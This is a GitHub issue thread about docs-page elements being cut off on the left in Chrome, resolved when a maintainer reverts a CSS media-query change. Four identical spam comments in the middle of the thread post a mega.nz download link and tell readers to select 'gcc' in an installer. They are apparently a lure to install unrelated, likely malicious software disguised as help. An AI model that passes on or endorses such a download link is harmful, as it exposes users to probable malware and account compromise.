### ISSUE TITLE
Elements on docs page are cut off on the left side of the page

### ISSUE THREAD

**Issue by burnout426** [zen-browser/docs#19]
Chrome 128.0.6613.85 64-bit on Windows 11 23H2.

Window maximized with screen resolution of 1366 x 768 just in case it matters.

At <https://docs.zen-browser.app/>, elements on the left-side of the page are cut off as shown in the attached pics. It's like they have a negative margin or something.
![zendocscut](https://github.com/user-attachments/assets/d323ab2c-30d9-4766-869a-f5af276f7d89)

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by IAmJafeth** [comment]
Hi @burnout426 

I am unable to recreate the issue with different Window sizes.
Could you please attach a full screenshot like this one?

![image](https://github.com/user-attachments/assets/cd87ac68-1879-4e09-959e-c985d91be0ff)

**Comment by burnout426** [comment]
![zendoccut2](https://github.com/user-attachments/assets/99734cd7-32c5-4835-b4c8-ef9f4b1ef3d0)

**Comment by IAmJafeth** [comment]
Hi @burnout426 ,

Some changes were reverted on the CSS media query that changes between mobile and desktop mode: 4d8774036dac5ff893d129b3c96987250669d68e

Could you please check if this solves the issue? 
You might me moved to the Mobile version, if you would like to see the Desktop version Zoom out with `Ctrl + -`

**Comment by burnout426** [comment]
Yep. It's all good now. Thanks.
